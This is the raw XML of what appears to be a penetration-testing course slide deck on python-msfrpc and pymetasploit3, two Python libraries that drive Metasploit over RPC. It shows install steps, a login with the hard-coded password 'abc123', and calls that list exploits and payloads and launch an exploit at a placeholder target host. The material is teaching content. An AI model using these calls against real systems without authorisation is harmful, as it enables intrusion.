            <a:endParaRPr sz="18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Pypykatz examples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67125" y="1112100"/>
            <a:ext cx="8604000" cy="543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Python-msfrpc is a Python extension to the Metasploit framework</a:t>
            </a:r>
            <a:endParaRPr sz="24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Made by SpiderLabs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https://github.com/SpiderLabs/msfrpc/tree/master/python-msfrpc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Only available for Python 2.x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Installation</a:t>
            </a:r>
            <a:endParaRPr sz="18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ensure you have Metasploit and Ruby on rails installed first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apt-get install postgresql libq-dev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gem install pg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-US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https://github.com/SpiderLabs/msfrpc.git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cd msfrpc/python-msfrpc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python install setup.py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Refer to the source code for more information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Python Metasploit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0025" y="4720925"/>
            <a:ext cx="1269875" cy="13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367125" y="1085700"/>
            <a:ext cx="8535600" cy="548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start the msfconsole and type:</a:t>
            </a:r>
            <a:endParaRPr sz="18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load msgrpc = abc123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 python 2.x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msfrpc #import the library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client =  msfrpc.Msfrpc({}) #start a new msfrpc instance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client.login(‘msfrpc’,’abc123’) #login with default creds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Setting up msfrpc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25" y="2034163"/>
            <a:ext cx="52387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63325" y="977125"/>
            <a:ext cx="9038400" cy="564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</a:rPr>
              <a:t>Gets a list of exploits from the server that can be enumerated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 = client.call('module.exploits')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</a:rPr>
              <a:t>Gets a list of compatible payloads for the first exploit in the exploit list from the server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 = client.call('module.compatible_payloads',[mod['modules'][0]])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</a:rPr>
              <a:t>Executes the exploit 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 = client.call(‘module.execute’,‘exploit’,mod,{‘RHOST’:&lt;target ip&gt;, ‘RPORT’:&lt;target port&gt;}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</a:rPr>
              <a:t>Unfortunately, there is not a lot of good documentation on this library. Understanding how this library interfaces with Metasploit is the best way to know how to use this library. We will explain more later.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Using python-msfrpc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67125" y="1067600"/>
            <a:ext cx="8517600" cy="557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Another Python extension to Metasploit. </a:t>
            </a:r>
            <a:endParaRPr sz="24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Originally built in Python 2.x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Has a Python 3.x version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Uses the same RPC service as python-msfrpc to interface with Metasploit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https://github.com/DanMcInerney/pymetasploit3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Installation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https://github.com/DanMcInerney/pymetasploit3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cd pymetasploit3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python3 setup.py install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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366713" y="188065"/>
            <a:ext cx="8326500" cy="69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PyMetasploit(3)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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="17387" t="7867" r="17073" b="7358"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367125" y="4903616"/>
            <a:ext cx="1130275" cy="146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24" y="5211375"/>
            <a:ext cx="568676" cy="56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Basi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2143</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>408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Impact</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Merriweather Sans</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Basic</vt:lpstr>
      <vt:lpstr>Alternate Basic</vt:lpstr>
      <vt:lpstr>Penetration Testing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Penetration Testing Tools</dc:title>
  <cp:lastModifiedBy>Mitchell J Lee</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-26T22:11:52Z</dcterms:modified>
</cp:coreProperties>
</file>